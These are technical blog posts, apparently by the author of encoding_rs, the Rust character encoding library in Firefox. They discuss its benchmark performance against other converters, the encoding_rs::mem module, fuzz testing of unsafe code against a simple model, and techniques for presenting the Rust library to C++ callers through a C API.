In contrast, the Windows system converters have been seriously optimized for the encodings that are the default “ANSI code page” for some Windows locale. Notably, this benchmark tested gb18030 (not default system code page for any locale) and not GBK (the default for Simplified Chinese), and gb18030 looks relatively slower than the code pages that are the default in some locale configuration of Windows. EUC-JP, however, looks well optimized in kernel32 despite it not being the default for any locale.

On the decode side, kernel32 is faster than encoding_rs for single-byte encodings for non-Latin scripts that use ASCII punctuation and spaces. However, for Thai and Latin scripts, encoding_rs is faster than kernel32 for single-byte encodings. This shows the cost of ASCII-acceleration when bouncing back to ASCII only for one or two bytes at a time and shows the downside of trying to limit the code footprint of encoding_rs by using the same code for all single-byte encodings with only the lookup table as a configurable variable.

On the encode side, kernel32 isextremely fast relative to other implementations for the encodings that are the default “ANSI code page” for some Windows locale (and for EUC-JP). Windows is not Open Source, so I haven’t seen the code, but from the performance characteristics it looks like kernel32 has a lookup table that can be directly indexed by a 16-bit Basic Multilingual Plane code point and that yields a pair of bytes that can be copied directly to output. In microbenchmarks that don’t involve SIMD-acceleratable ASCII runs, it’s basically impossible to do better. It is hard to know what the cache effects of a maximally large lookup table are outside microbenchmarks, but the lookup table footprint just for CJK Unified Ideographs or just for Hangul Syllables is a large number of cache lines anyway.

Considering the use cases for the kernel32 converters, optimizing for extreme speed rather than small footprint makes sense. When pre-Unicode legacy apps are run on Windows, all calls to systems APIs that involve strings convert between the application-side “ANSI code page” and the system-side UTF-16. Typically, all apps run with the same legacy “ANSI code page”, so only the lookup table for one encoding needs to be actively accessed.

If the mission of the legacy encoders in encoding_rs was to provide maximally fast conversion to legacy encodings as opposed to providing correct conversion to legacy encodings with minimal footprint and just enough speed for the user not to complain about form submission, it would totally make sense to use tables directly indexably by 16-bit Basic Multilingual Plane code point.

uconv

Overall, performance-wise the rewrite was an improvement. (More about UTF-16 to UTF-8 encode below.) As far as I can tell, the EUC-KR results for uconv are not a benchmark environment glitch but the EUC-KR implementation in uconv was just remarkably inefficient. The Big5 results say nothing about the original design of uconv. The uconv Big5 implementation being compared with in the one I wrote for Firefox 43, and that implementation already did away with encode-oriented data tables.

In encoding_rs, the ISO-2022-JP decoder uses a state variable while uconv was a bit faster thanks to using the program counter for state.

rust-encoding

As noted earlier in the “Apples to Oranges Comparisons” section, the numbers to and from UTF-8 show how much better borrowing is compared to copying when borrowing is possible. That is, encoding_rs borrows and rust-encoding copies.

ICU

ICU is an immensely useful and important library, but I am somewhat worried about the mentality that everyone should just standardize on ICU, and that no one can afford to rewrite ICU. In particular, I’m worried about the “just use ICU” approach entrenching UTF-16 as an in-memory representation of Unicode even more at a time when it’s increasingly clear that UTF-8 should be used not only as the interchange representation but also as the in-memory representation of Unicode. I hope the x86_64 and aarch64 results here encourage others to try to do better than ICU, (piece-wise, as the Rust ecosystem is doing) instead of just settling on ICU.

On ARMv7, encoding_rs performs worse than ICU for decoding non-windows-1252 single-byte encodings into UTF-16. This shows how encoding_rs’s design relies heavily on SIMD. ARMv7 has weaker SIMD functionality than x86, x86_64 or aarch64, so the split between ASCII and non-ASCII is a pessimization on ARMv7. In the x86_64 case the benefits of SSE2 for markup offset the downsides of the ASCII/non-ASCII handling split for natural language in the Wikipedia case. Fortunately, mobile browsing skews even more towards UTF-8 than the Web in general, migration from the affected encodings to UTF-8 is, anecdotally, even further along than migration to UTF-8 in general, and aarch64 is around the corner, so I think it isn’t worthwhile to invest effort or binary footprint into having a different design for ARMv7.

Encode from UTF-16 to UTF-8

While encoding_rs is a lot faster than the other libraries when encoding ASCII or almost-ASCII from UTF-16 to UTF-8, encoding_rs does worse than uconv, kernel32 and ICU in cases where there is only short runs of ASCII, typically one ASCII space, mixed with non-ASCII. This is consistent for the Arabic, Greek, Hebrew and Russian but relative to kernel32this shows up also for Korean and for the Latin script—not just for Vietnamese (with which the effect also shows up relative to uconv), Turkish and Czech that whose non-ASCII frequency is obviously high but even for French.

This shows that the cost of swiching between the ASCII fast path and the non-ASCII mode is higher for UTF-16 input than for single-byte input, which makes sense, since checking whether a SIMD vector of 16-bit units is in the Basic Latin range requires more SSE2 operations that checking a vector of 8-bit units. Considering that the benefit of the ASCII fast path is so large in the ASCII case, I ended up keeping the ASCII fast path, despite it being a pessimization, though, fortunately, not a huge one, for many languages.

Single-Byte Encode

Arabic, Hebrew, Greek and Russian are all written in non-Latin scripts that use ASCII spaces and punctuation. Why does Arabic encode perform so much worse? The reason is that the trick of identifying a contiguous dominant range of code points that maps by offset is not as good a fit for windows-1256 as it is for windows-1251, windows-1252, windows-1253, and windows-1255. While there is a range of Arabic characters that is contiguous in both Unicode and in windows-1256, some characters are not in that range. In contrast, all Hebrew consonants (the test data is not vocalized) map by offset between Unicode and windows-1255. The Cyrillic letters needed for Russian are likewise mappable by offset between Unicode and windows-1251 as are Greek lower-case letters (and some upper case ones) in windows-1253. Of course, the bulk of windows-1252 maps by offset.

The approach of offsetting one range does not work at all for windows-1250.

Considering how for Web browser use cases even the relatively extremely slow speed of legacy CJK encode is fast enough, non-ASCII single-byte encode is fast enough for Web browser use cases even when the approach of offsetting a range does not work. The offset approach is just a very small-footprint tweak that is a nice bonus when it does work.

The Rust Standard Library

UTF-8 validation in the Rust standard library is very fast. It took quite a bit of effort to do better. (I hope that the code from encoding_rs gets upstreamed to the standard library eventually.) I managed to make encoding_rs faster than the standard library for input that’s not 100% ASCII first, but even when encoding_rs was faster than the standard library for English Wikipedia, the standard library was still faster for 100% ASCII. To make encoding_rs faster even in that case, it was necessary to introduce a two-tier approach even to the ASCII fast path. Assuming that the input is long enough to use SIMD at all, first the ASCII fast path processes 16 bytes as an unalinged SSE2 read. If that finds non-ASCII, the cost of having bounced to the SIMD path is still modest. If the first 16 bytes are ASCII, the fast path enters an ever faster path that uses aligned reads and unrolls the loop by two.

The data cache footprint of the UTF-8 validation function in the Rust standard library is 256 bytes or four cache lines. The data cache footprint of encoding_rs’s UTF-8 validation function is 384 bytes or six cache lines, so 50% more. Using a lookup table to speed up a function that in principle should be doing just simple bit manipulation is a bit questionable, because benchmarks show behavior where the cost of bringing the lookup table to the cache is amortized across the benchmark iterations and the application-context cost of having to evict something else is not visible. For long inputs containing non-ASCII, using a lookup table is clearly justified. The effects on handling short strings as part of a larger system are unclear. As we’ve learned from Spectre, we shouldn’t assume that the 100% ASCII case avoids bringing the lookup table into the data cache.

WebKit

What bothers me the most about the benchmark results is that WebKit’s UTF-8 to UTF-16 decoder is faster than encoding_rs’s for the 100% ASCII case. That encoding_rs is faster for English Wikipedia content shows how specialized the WebKit win is. Closing the gap did not succeed using the same approach that worked in the case of closing the UTF-8 validation performance gap with the Rust standard library (which involved only reads, while decoding to UTF-16 involves writes, too). I don’t want to sacrifice encoding_rs’s performance in the case where the input isn’t 100% ASCII. The obvious solution would be to introduce very ASCII-biased prefix handling and moving to the current more balanced (between ASCII and non-ASCII) encoding_rs code when the first non-ASCII byte is seen. However, I don’t want to introduce a performance cliff like that. Consider a single copyright sign in a license header at the top of an otherwise ASCII file. For a long file, a good implementation should be able to climb back to the fast path after the copyright sign. As a consolation, the 100% ASCII case matters the most for CSS and JavaScript. In Gecko, the CSS case already uses UTF-8 validation instead of UTF-8 to UTF-16 conversion and JavaScript is on track to moving from UTF-8 to UTF-16 conversion to UTF-8 validation.

Interestingly, WebKit’s ASCII fast path is written as ALU code. I didn’t bother trying to locate the right disassembly, but if the performance is any indication, GCC must be unrolling and autovectrorizing WebKit’s ASCII fast path.

kewb

Bob Steagall’s UTF-8 to UTF-16 decoder that combines SSE2 with a Deterministic Finite Automaton (DFA) is remarkably fast. While encoding_rs is a bit faster for Latin script with very infrequent non-ASCII (the threshold is between German and Portuguese) and for writing that doesn’t use use ASCII spaces (Thai, Chinese, and Japanese), the DFA is faster for everything that involves more frequent transitions between ASCII and non-ASCII. I haven’t studied properly how the implementation manages the transitions between SSE2 and the DFA, but the result is awesome.

Compared to encoding_rs’s lookup table of 384 bytes or six cache lines, the DFA has a larger data cache footprint: the presentation slides say 896 bytes or 14 cache lines. As noted earlier, in the benchmarks the cost of bringing the tables into the cache are amortized across benchmark iterations and the cost of having to evict something else in a real-world application is not visible in a benchmark. Considering that encoding_rs::mem (discussed below) reuses encoding_rs’s UTF-8 to UTF-16 decoder for potentially short strings, I’m reluctant to adopt the DFA design that could have adverse cache effects in an application context.

One More Thing: encoding_rs::mem

The above discussion has been about encoding_rs in its role for converting between external encodings and the application-internal Unicode representation(s). That kind of usage calls for a well-designed streaming API when incremental processing of HTML (and XML) is one of the use cases. However, if an application that has, for legacy reasons, multiple application-internal representations, converting between those generally calls less for streaming generality and more for API simplicity.

A Rust application written from scratch could do well with just one application-internal Unicode representation: UTF-8. However, Gecko, JavaScript, and the DOM API were created at the time when it was believed that Unicode was a 16-bit code space and that the application-internal Unicode representation should consist of 16-bit units. In the same era, Java, Windows NT, and Qt, among others, committed to 16-bit units in their internal Unicode representations.

With the benefit of hindsight, we can now say that it was a mistake to commit to 16-bit units in the application-internal Unicode representation. At the upper end of the code space, it became clear that 16 bits weren’t enough and Unicode was extended to 21 bits, so UTF-16 with surrogates was introduced making a memory representation consisting of 16-bits units variable-width representation anyway (even without considering grapheme clusters). At the lower end of the code space, it became clear that the ASCII range remains quite a bit more overrepresented than one might have expected by looking at the natural language is used around the world: Various textual computer syntaxes tend to use ASCII. In the context of Gecko, the syntax of HTML, XML, CSS and JavaScript is ASCII.

To cope with these realities, Gecko now uses UTF-8 internally for some things and in some cases tries to store semantically UTF-16 data without the higher half of each code unit—i.e. storing data as Latin1 if possible. In Gecko, this approach is used for JavaScript strings and DOM text nodes. (This approach isn’t unique to Gecko. It is also used in V8, optionally in HotSpot and, with Latin1, UCS-2 and UTF-32 levels, in Python 3. Swift is moving away from a similar dual model to UTF-8.) When adding to the mix that Rust code is confident about UTF-8 validity but C++ isn’t, Gecko ends up with four kinds of internal text representations:

  • UTF-16 whose validity cannot be trusted
  • Latin1 that cannot be invalid
  • UTF-8 whose validity cannot be fully trusted
  • UTF-8 whose validity can be fully trusted

encoding_rs::mem provides efficient conversions between these four cases as well as functionality for checking if UTF-16 or UTF-8 only contains code points in the Latin1 range. Furthermore, the module also is able to check if text for sure does not contain any right-to-left text. While this check seems to be out of place in this module, it makes sense to combine this check with a Latin1ness check when creating DOM text nodes. Also, it makes sense to optimize the check using portable SIMD. (In Gecko, documents start their life as left-to-right-only. As long as they stay that way, the Unicode Bidirectional Algorithm can be optimized out in layout. However, whenever text is added to the document, it needs to be inspected to see if it might contain right-to-left characters. Once at least one such character is encountered, the document transitions into the bidi mode and the Unicode Bidirectional Algorithm is used in layout from then on.)

Notably, the use case of converting in-memory text is different from converting incrementally-parsed HTML or XML. Instead of providing streaming conversion, encoding_rs::mem provides conversions in a non-streaming manner, which enables a simpler API. In most cases, the caller is supposed to allocate the target buffer according to the maximum possible length requirement. As an exception, conversions to UTF-8 can be performed in multiple steps in order to avoid excessive allocation, considering that the maximum possible length requirement when converting from UTF-16 to UTF-8 is three times the minimum possible case. The general assumption is that when converting from UTF-16 to UTF-8, first this buffer is sized according to the minimum possible case and rounded up to the allocator bucket and if the result doesn’t fit, then the maximum possible case is tried. When converting XPCOM strings, though, there’s an additional heuristic that looks at the first two cache lines of the UTF-16 buffer in order to make a guess whether the initial allocation should be larger than the minimum possible size.

Since Gecko uses an allocator with power-of-two buckets, is not worthwhile to compute the buffer size requirements precisely. Being a bit wrong still often ends up in the same allocator bucket. Indeed, the new code that makes guesses and occasionally reallocates is generally faster than the old code that tried to compute the buffer size requirements precisely and ended up doing UTF math twice in the process.

The code for encoding_rs::mem looks rather unreviewable. It is that way due performance reasons. The messy look arisis from SIMD with raw pointers, manual alignment handling and manual loop unrolling. To convince myself and others that the code does what it is supposed to do, I created another implementation of the same API in the simplest way possible using the Rust standard library facilities. Then I benchmarked the two to verify that my complicated code indeed was faster. Then I used cargo-fuzz to pass the same fuzzing input to both implementations and seeing that their output agrees (and that there a no panics or Address Sanitizer-reported problems).

This description of encoding_rs::mem looks thematically quite different from the earlier discussion of encoding_rs proper. Indeed, as far as API usage goes, encoding_rs::mem should be a separate crate. The only reason why it is a submodule is that the two share implementation details that don’t make sense to expose as a third crate with the public API. Users of encoding_rs that don’t need encoding_rs::mem should simply ignore the submodule and let link-time optimization discard it.

The combination of encoding_rs’s faster converter internals with the new allocation strategy that is a better fit for Gecko’s memory allocator was a clear performance win. My hope is that going forward conversion between UTF-8 and UTF-16 will be perceived as having acceptable enough a cost that Gecko developers will feel more comfortable with components that use UTF-8 internally even if it means that a conversion has to happen on a component boundary. On the other hand, I’m hoping to use this code to speed up a case where there already is a boundary even though the boundary is easy to forget: The WebIDL boundary between JavaScript and C++. Currently, when SpiderMonkey has a Latin1 string, it is expanded to UTF-16 at the DOM boundary, so e.g. using TextEncoder to encode an ASCII JavaScript string to UTF-8 involves expanding the string to UTF-16 and then encoding from UTF-16 to UTF-8 when just copying the bytes over should be logically possible.

Henri SivonenUsing cargo-fuzz to Transfer Code Review of Simple Safe Code to Complex Code that Uses unsafe

encoding_rs::mem is a Rust module for performing conversions between different in-RAM text representations that are relevant to Gecko. Specifically, it converts between potentially invalid UTF-16, Latin1 (in the sense that unsigned byte value equals the Unicode scalar value), potentially invalid UTF-8, and guaranteed-valid UTF-8, and provides some operations on buffers in these encodings, such as checking if a UTF-16 or UTF-8 buffer only has code points in the ASCII range or only has code points in the Latin1 range. (You can read more about encoding_rs::mem in a write-up about encoding_rs as a whole.)

The whole point of this module is to make things very fast using Rust’s (not-yet-stable) portable SIMD features. The code was written before slices in the standard library had the align_to method or the chunks_exact method. Moreover, to get speed competitive with the instruction set-specific and manually loop-unrolled C++ code that the Rust code replaced, some loop unrolling is necessary, but Rust does not yet support directives for the compiler that would allow the programmer to request specific loop unrolling from the compiler.

As a result, the code is a relatively unreviewable combination of manual alignment calculations, manual loop unrolling and manual raw pointer handling. This indeed achieves high speed, but by looking at the code, it isn’t at all clear whether the code is actually safe or otherwise correct.

To validate the correctness of the rather unreviewable code, I used model-based testing with cargo-fuzz. cargo-fuzz provides Rust integration for LLVM’s libFuzzer coverage-guided fuzzer. That is, the fuzzer varies the inputs it tries based on observing how the inputs affect the branches taken inside the code being fuzzed. The fuzzer runs with one of LLVM’s sanitizers enabled. By default, the Address Sanitizer (ASAN) is used. (Even though the sanitizers should never find bugs in safe Rust code, the sanitizers are relevant to bugs in Rust code that uses unsafe.)

I wrote a second implementation (the “model”) of the same API in the most obvious way possible using Rust standard-library facilities and without unsafe, except where required to be able to write into an &mut str. I also used the second implementation to validate the speed of the complex implementation. Obviously, there’d be no point in having a complex implementation if it wasn’t faster than the simple and obvious one. (The complex implementation is, indeed, faster.)

For example, the function for checking if a buffer of potentially invalid UTF-16 only contains characters in the Latin1 range is 8 lines (including the function name and the closing brace) in the safe version. In the fast version, it’s 3 lines that just call to another function expanded from a macro, where the expansion is either generated using either a 76-line SIMD-using macro or a 71-line ALU-using macro depending on whether the code was compiled with SIMD enabled. Of these macros, the SIMD calls another (tiny) function that has a specialized implementation for aarch64 and a portable implementation.

To use cargo-fuzz, you create a “fuzzer script”, which is a Rust function that gets a slice of bytes from the fuzzer and exercises the code being fuzzed. In the case of fuzzing encoding_rs::mem, the first byte is used to decide which function to exercise and the rest of the slice is used as the input to the function. When the function being called takes a slice of u16, a suitably aligned u16 subslice of the input is taken.

For each function, the fuzzer script calls both the complex implementation and the corresponding simple implementation with the same input and checks that the outputs match. The fuzzer finds a bug if the outputs don’t match, if there is a panic, or if the LLVM Address Sanitizer notices bad memory access, which could arise from the use of unsafe.

Once the fuzzer fails to find problems after having run for a few days, we can have high confidence that the complex implementation is correct in the sense that its observable behavior, ignoring speed, matches the observable behavior of the simple implementation. Therefore, a code review for the correctness of the simple implementation can, with high confidence, be considered to apply to the complex implementation as well.

Henri SivonenHow I Wrote a Modern C++ Library in Rust

Since version 56, Firefox has had a new character encoding conversion library called encoding_rs. It is written in Rust and replaced the old C++ character encoding conversion library called uconv that dated from early 1999. Initially, all the callers of the character encoding conversion library were C++ code, so the new library, despite being written in Rust, needed to feel usable when used from C++ code. In fact, the library appears to C++ callers as a modern C++ library. Here are the patterns that I used to accomplish that.

(There is another write-up about encoding_rs itself. I presented most of the content in this write-up in my talk at RustFest Paris: video, slides.)

Modern C++ in What Way?

By “modern” C++ I mean that the interface that C++ callers see conforms to the C++ Core Guidelines and uses certain new features:

  • Heap allocations are managed by returning pointers to heap-allocated objects within std::unique_ptr / mozilla::UniquePtr.
  • Caller-allocated buffers are represented using gsl::span / mozilla::Span instead of plain pointer and length.
  • Multiple return values are represented using std::tuple / mozilla::Tuple instead of out params.
  • Non-null plain pointers are annotated using gsl::not_null / mozilla::NotNull.

gsl:: above refers to the Guidelines Support Library, which provides things that the Core Guidelines expect to have available but that are not (yet) in the C++ standard library.

C++ Library in Rust?

By writing a C++ library “in Rust” I mean that the bulk of the library is actually a library written in Rust, but the interface provided to C++ callers makes it look and feel like a real C++ library as far as the C++ callers can tell.

Both C++ and Rust Have C Interop

C++ has a very complex ABI, and the Rust ABI is not frozen. However, both C++ and Rust support functions that use the C ABI. Therefore, interoperability between C++ and Rust involves writing things in such a way that C++ sees Rust code as C code and Rust sees C++ code as C code.

Simplifying Factors

This write-up should not be considered a comprehensive guide to exposing Rust code to C++. The interface to encoding_rs is simple enough that it lacks some complexities that one could expect from the general case of interoperability between the two languages. However, the factors that simplify the C++ exposure of encoding_rs can be taken as a guide to simplifications that one should seek to achieve in the interest of easy cross-language interoperability when designing libraries. Specifically:

  • encoding_rs never calls out to C++: The cross-language calls are unidirectional.
  • encoding_rs does not hold references to C++ objects after a call returns: There is no need for Rust code to manage C++ memory.
  • encoding_rs does not present an inheritance hierarchy either in Rust or in C++: There are no vtables on either side.
  • The datatypes that encoding_rs operates on are very simple: Contiguous buffers of primitives (buffers of u8/uint8_t and u16/char16_t).
  • Only the panic=abort configuration (i.e. a Rust panic terminates the program instead of unwinding the stack) is supported and the code presented here is only correct if that option is used. The code presented here does not try to prevent Rust panics from unwinding across the FFI, and letting a panic unwind across the FFI is Undefined Behavior.

A Very Quick Look at the API

To get an idea about the Rust API under discussion, let’s take a high-level look. The library has three public structs: Encoding, Decoder and Encoder. From the point of view of the library user, these structs are used like traits, superclasses or interfaces in the sense that they provide a uniform interface to various concrete encodings, but technically they are indeed structs. Instances of Encoding are statically allocated. Decoder and Encoder encapsulate the state of a streaming conversion and are allocated at run-time.

A reference to an Encoding, that is &'static Encoding, can be obtained either from label (textual identification extracted from protocol text) or by a named static. The Encoding can then be used as a factor for a Decoder, which is stack-allocated.

let encoding: &'static Encoding =
    Encoding::for_label( // by label
        byte_slice_from_protocol
    ).unwrap_or(
        WINDOWS_1252     // by named static
    );

let decoder: Decoder =
    encoding.new_decoder();

In the streaming case, a method for decoding from a caller-allocated slice into another caller-allocate slice is available on the Decoder. The decoder performs no heap allocations.

pub enum DecoderResult {
    InputEmpty,
    OutputFull,
    Malformed(u8, u8),
}

impl Decoder {
    pub fn decode_to_utf16_without_replacement(
        &mut self,
        src: &[u8],
        dst: &mut [u16],
        last: bool
    ) -> (DecoderResult, usize, usize)
}

In the non-streaming case, the caller does not need to deal with Decoder and Encoder at all. Instead, methods for handling an entire logical input stream in one buffer are provided on Encoding.

impl Encoding {
    pub fn decode_without_bom_handling_and_without_replacement<'a>(
        &'static self,
        bytes: &'a [u8],
    ) -> Option<Cow<'a, str>>
}

The Process

0. Designing for FFI-friendliness

Some of the simplifying factors arise from the problem domain itself. Others are a matter of choice.

A character encoding library could reasonably present traits (similar to abstract superclasses with no fields in C++) for each of the concepts of an encoding, a decoder and an encoder. Instead, encoding_rs has structs for these that internally match on an enum for dispatch instead of relying on a vtable.

pub struct Decoder { // no vtable
   variant: VariantDecoder,
   // ...
}

enum VariantDecoder { // no extensibility
    SingleByte(SingleByteDecoder),
    Utf8(Utf8Decoder),
    Gb18030(Gb18030Decoder),
    // ...
}

The primary motivation for this wasn’t as much eliminating vtables per se but to make the hierarchy intentionally unextensible. This reflects a philosophy that adding character encodings is not something that programmers should do. Instead, programs should use UTF-8 for interchange, and programs should support legacy encodings only to the extent necessary for compatibility with existing content. The non-extensibility of the hierarchy provides stronger type-safety. If you have an Encoding from encoding_rs, you can trust that it doesn’t exhibit characteristics that aren’t exhibited by the encodings defined in the Encoding Standard. That is, you can trust that it won’t behave like UTF-7 or EBCDIC.

Additionally, by dispatching on an enum, a decoder for one encoding can internally morph into a decoder for another encoding in response to BOM sniffing.

One might argue that the Rustic way to provide encoding converters would be making them into iterator adaptors that consume an iterator of bytes and yield Unicode scalar values or vice versa. In addition to iterators being more complex to expose across the FFI, iterators make it harder to perform tricks to accelerate ASCII processing. Taking a slice to read from and a slice to write to not only makes it easier to represent things in a C API (in C terms, a Rust slice decomposes to an aligned non-null pointer and a length) but also enables ASCII acceleration by processing more than one code unit at a time making use of the observation that multiple code units fit in a single register (either an ALU register or a SIMD register).

If the Rust-native API deals only with primitives, slices and (non-trait object) structs, it is easier to map to a C API than a Rust API that deals with fancier Rust features. (In Rust, you have a trait object when type erasure happens. That is, you have a trait-typed reference that does not say the concrete struct type of the referent that implements the trait.)

1. Creating the C API

When the types involved are simple enough, the main mismatches between C and Rust are the lack of methods and multiple return values in C and the inability to transfer non-C-like structs by value.

  • Methods are wrapped by functions whose first argument is a pointer to the struct whose method is being wrapped.
  • Slice arguments become two arguments: the pointer to the start of the slice and the length of the slice.
  • One primitive value is returned as a function return value and the rest become out params. When the output params clearly relate to inputs of the same type, it makes sense to use in/out params.
  • When a Rust method returns the struct by value, the wrapper function boxes it and returns a pointer such that the Rust side forgets about the struct. Additionally, a function for freeing a given struct type by pointer is added. Such a method simply turns pointer back into a box and drops the box. The struct is opaque from the C point of view.
  • As a special case, the method for getting the name of an encoding, which in Rust would return &'static str is wrapped by a function that takes a pointer to writable buffer whose length must be at least the length of the longest name.
  • enums signaling the exhaustion of the input buffer, the output buffer becoming full or errors with detail about the error became uint32_t with constants for “input empty” and “output full” and rules for how to interpret the other error details. This isn’t ideal but works pretty well in this case.
  • Overflow-checking length computations are presented as saturating instead. That is, the caller has to treat SIZE_MAX as a value signaling overflow.

2. Re-Creating the Rust API in C++ over the C API

Even an idiomatic C API doesn’t make for a modern C++ API. Fortunately, Rustic concepts like multiple return values and slices can be represented in C++, and by reinterpreting pointers returned by the C API as pointers to C++ objects, it’s possible to present the ergonomics of C++ methods.

Most of the examples are from a version of the API that uses C++17 standard library types. In Gecko, we generally avoid the C++ standard library and use a version of the C++ API to encoding_rs that uses Gecko-specific types. I assume that the standard-library-type examples make more sense to a broader audience.

Method Ergonomics

For each opaque struct pointer type in C, a class is defined in C++ and the C header is tweaked such that the pointer types become pointers to instances of the C++ classes from the point of view of the C++ compiler. This amounts to a reinterpret_cast of the pointers without actually writing out the reinterpret_cast.

Since the pointers don’t truly point to instances of the classes that they appear to point to but point to instances of Rust structs instead, it’s a good idea to take some precautions. No fields are declared for the classes. The default no-argument and copy constructors are deleted as is the default operator=. Additionally, there must be no virtual methods. (This last point is an important limitation that will come back to later.)

class Encoding final {
// ...
private:
    Encoding() = delete;
    Encoding(const Encoding&) = delete;
    Encoding& operator=(const Encoding&) = delete;
    ~Encoding() = delete;
};

In the case of Encoding whose all instances are static, the destructor is deleted as well. In the case of the dynamically-allocated Decoder and Encoder both an empty destructor and a static void operator delete is added. (An example follows a bit later.) This enables the destruction of the fake C++ class to be routed to the right type-specific freeing function in the C API.

With that foundation in place to materialize pointers that look like pointers to C++ class instances, it’s possible to make method calls on this pointers work. (An example follows after introducing the next concept, too.)

Returning Dynamically-Allocated Objects

As noted earlier, the cases where the Rust API would return an Encoder or a Decoder by value so that the caller can place them on the stack is replaced by the FFI wrapper boxing the objects so that the C API exposes only heap-allocated objects by pointer. Also, the reinterpretation of these pointers as deleteable C++ object pointers was already covered.

That still leaves making sure that delete is actually used at an appropriate time. In modern C++, when an object can have only one legitimate owner of the time, this is accomplished by wrapping the object pointer in std::unique_ptr or mozilla::UniquePtr. The old uconv converters supported reference counting, but all the actual uses in the Gecko code base involved only one owner for each converter. Since the usage patterns of encoders and decoders are such that there is only one legitimate owner of the time, using std::unique_ptr and mozilla::UniquePtr is what the two C++ wrappers for encoding_rs do.

Let’s take a look at a factory method on Encoding that returns a Decoder. In Rust, we have a method that takes a reference to self and returns Decoder by value.

impl Encoding {
    pub fn new_decoder(&'static self) -> Decoder {
        // ...
    }
}

On the FFI layer, we have an explicit pointer-typed first argument that corresponds to Rust &self and C++ this (specifically, the const version of this). We allocate memory on the heap (Box::new()) and place the Decoder into the allocated memory. We then forget about the allocation (Box::into_raw) so that we can return the pointer to C without deallocating at the end of the scope. In order to be able to free the memory, we introduce a new function that puts the Box back together and assigns it into a variable that immediately goes out of scope causing the heap allocation to be freed.

#[no_mangle]
pub unsafe extern "C" fn encoding_new_decoder(
    encoding: *const Encoding) -> *mut Decoder
{
    Box::into_raw(Box::new((*encoding).new_decoder()))
}

#[no_mangle]
pub unsafe extern "C" fn decoder_free(decoder: *mut Decoder) {
    let _ = Box::from_raw(decoder);
}

In the C header, they look like this:

ENCODING_RS_DECODER*
encoding_new_decoder(ENCODING_RS_ENCODING const* encoding);

void
decoder_free(ENCODING_RS_DECODER* decoder);

ENCODING_RS_DECODER is a macro that is used for substituting the right C++ type when the C header is used in the C++ context instead of being used as a plain C API.

On the C++ side, then, we use std::unique_ptr, which is the C++ analog of Rust’s Box. They are indeed very similar:

let ptr: Box<Foo>
std::unique_ptr<Foo> ptr
Box::new(Foo::new(a, b, c))
make_unique<Foo>(a, b, c)
Box::into_raw(ptr)
ptr.release()
let ptr = Box::from_raw(raw_ptr);
std::unique_ptr<Foo> ptr(raw_ptr);

We wrap the pointer obtained from the C API in a std::unique_ptr:

class Encoding final {
public:
    inline std::unique_ptr<Decoder> new_decoder() const
    {
        return std::unique_ptr<Decoder>(
            encoding_new_decoder(this));
    }
};

When the std::unique_ptr<Decoder> goes out of scope, the deletion is routed back to Rust via FFI thanks to declarations like this:

class Decoder final {
public:
    ~Decoder() {}
    static inline void operator delete(void* decoder)
    {
        decoder_free(reinterpret_cast<Decoder*>(decoder));
    }
private:
    Decoder() = delete;
    Decoder(const Decoder&) = delete;
    Decoder& operator=(const Decoder&) = delete;
};
How Can it Work?

In Rust, non-trait methods are just syntactic sugar:

impl Foo {
    pub fn get_val(&self) -> usize {
        self.val
    }
}

fn test(bar: Foo) {
    assert_eq!(bar.get_val(), Foo::get_val(&bar));
}

A method call on non-trait-typed reference is just a plain function call with the reference to self as the first argument. On the C++ side, non-virtual method calls work the same way: A non-virtual C++ method call is really just a function call whose first argument is the this pointer.

On the FFI/C layer, we can pass the same pointer as an explicit pointer-typed first argument.

When calling ptr->Foo() where ptr is of type T*, the type of this is T* if the method is declared as void Foo() (which maps to &mut self in Rust) and const T* if the method is declared as void Foo() const (which maps to &self in Rust), so const-correctness is handled, too.

fn foo(&self, bar: usize) -> usize
size_t foo(size_t bar) const
fn foo(&mut self, bar: usize) -> usize
size_t foo(size_t bar)

The qualifications about “non-trait-typed” and “non-virtual” are important. For the above to work, we can’t have vtables on either side. This means no Rust trait objects and no C++ inheritance. In Rust, trait objects, i.e. trait-typed references to any struct that implements the trait, are implemented as two pointers: one to the struct instance and another to the vtable appropriate for the concrete type of the data. We need to be able to pass reference to self across the FFI as a single pointer, so there’s no place for the vtable pointer when crossing the FFI. In order to keep pointers to C++ objects as C-compatible plain pointers, C++ puts the vtable pointer on the objects themselves. Since the pointers don’t really point to C++ objects carrying vtable pointers but point to Rust objects, we must make sure not to make the C++ implementation expect to find a vtable pointer on the pointee.

As a consequence, the C++ reflector classes for the Rust structs cannot inherit from a common baseclass of a C++ framework. In the Gecko case, the reflector classes cannot inherit from nsISupports. E.g. in the context of Qt, the reflector classes wouldn’t be able to inherit from QObject.

Non-Nullable Pointers

There are methods in the Rust API that return &'static Encoding. Rust references can never be null, and it would be nice to relay this piece of information in the C++ API. It turns out that there is a C++ idiom for this: gsl::not_null and mozilla::NotNull.

Since gsl::not_null and mozilla::NotNull are just type system-level annotations that don’t change the machine representation of the underlying pointer and since from the guarantees Rust we know which pointers that we get from the FFI really never are null, it is tempting to apply the same reinterpretation trick of lying to the C++ compiler about types that we use to reinterpret pointers returned by the FFI as pointers to fieldless C++ objects with no virtual methods and to claim in a header file that the pointers that we know not to be null in the FFI return values are of the type mozilla::NotNull<const Encoding*>. Unfortunately, this doesn’t actually work because types involving templates are not allowed in the declarations of extern "C" functions in C++, so the C++ code ends up executing a branch for the null check when wrapping pointers received from the C API with gsl::not_null or mozilla::NotNull.

However, there are also declarations of static pointers to the constant encoding objects (where the pointees are defined in Rust) and it happens that C++ does allow declaring those as gsl::not_null<const Encoding*>, so that is what is done. (Thanks to Masatoshi Kimura for pointing out that this is possible.)

The statically-allocated instances of Encoding are declared in Rust like this:

pub static UTF_8_INIT: Encoding = Encoding {
    name: "UTF-8",
    variant: VariantEncoding::Utf8,
};

pub static UTF_8: &'static Encoding = &UTF_8_INIT;

In Rust, the general rule is that you use static for an unchanging memory location and const for an unchanging value. Therefore, UTF_8_INIT should be static and UTF_8 should be const: the value of the reference to the static instance is unchanging, but statically allocating a memory location for the reference is not logically necessary. Unfortunately, Rust has a rule that says that the right-hand side of const may not contain anything static and this is applied so heavily as to prohibit even references to static, in order to ensure that the right-hand side of a const declaration can be statically checked to be suitable for use within any imaginable const declaration—even one that tried to dereference the reference at compile time.

